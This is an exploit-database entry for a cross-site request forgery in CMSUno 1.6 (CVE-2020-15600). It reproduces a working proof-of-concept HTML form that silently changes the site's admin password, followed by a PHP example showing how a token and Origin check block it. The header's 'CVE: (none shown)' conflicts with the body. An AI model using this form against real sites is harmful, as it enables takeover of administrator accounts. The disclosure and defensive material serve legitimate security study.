CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)

CVE: (none shown)
Category: CWE-352
Price: $500
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2023-09-15
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090053

Below is a copy:

# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-07-22
# Exploit Author: Gh05t666include (AnonGhost Indonesia) 
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC : 

<html>
<body>
<!-- CSRF PoC as published: a form on another origin that POSTs user and pass to uno.php -->
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/cmsuno-master/uno.php" method="POST">
<input type="hidden" name="user" value="admin"/>
<input type="hidden" name="pass" value="yourpassword"/>
<input type="submit" name="user" value="Submit request"/>
</form>
</body>
</html>
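
One way a handler like uno.php can refuse the request above, as an added example (not CMSUno's code and not the project's 1.6.1 fix): a per-session token compared with hash_equals, plus an Origin check. The function names, the `csrf` field and TRUSTED_ORIGIN are assumptions, and attacker.example is a constructed placeholder.

```php
<?php
declare(strict_types=1);
// Hypothetical names throughout; this is not CMSUno's uno.php or its 1.6.1 fix.
const TRUSTED_ORIGIN = 'http://127.0.0.1'; // assumption: the site's own origin

/** Create one random token per session; the admin form embeds it as a hidden field. */
function issue_csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

/** Origin of the page that sent the request, from Origin or (fallback) Referer. */
function request_origin(array $server): ?string
{
    $src = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    $p = is_string($src) ? parse_url($src) : false;
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) {
        return null; // header absent, "null", or not a URL
    }
    return $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '');
}

/** Status the handler would send: 200 only for a same-origin POST carrying the token. */
function check_password_change(array $session, array $post, array $server): int
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 405;
    }
    if (request_origin($server) !== TRUSTED_ORIGIN) {
        return 403; // cross-site, or no usable Origin/Referer
    }
    $sent = $post['csrf'] ?? '';
    if (!is_string($sent) || empty($session['csrf']) || !hash_equals($session['csrf'], $sent)) {
        return 403; // token missing or wrong
    }
    return 200; // only now is it safe to change the password
}

// Constructed requests: the PoC's fields sent from a foreign page, then the real admin form.
$session = [];
$token = issue_csrf_token($session);
$forged = check_password_change($session, ['user' => 'admin', 'pass' => 'x'],
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example']);
$legit = check_password_change($session, ['user' => 'admin', 'pass' => 'x', 'csrf' => $token],
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://127.0.0.1']);
printf("forged=%d legit=%d\n", $forged, $legit);
```

Setting the session cookie with SameSite=Lax or Strict adds a second layer but does not replace the token check.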
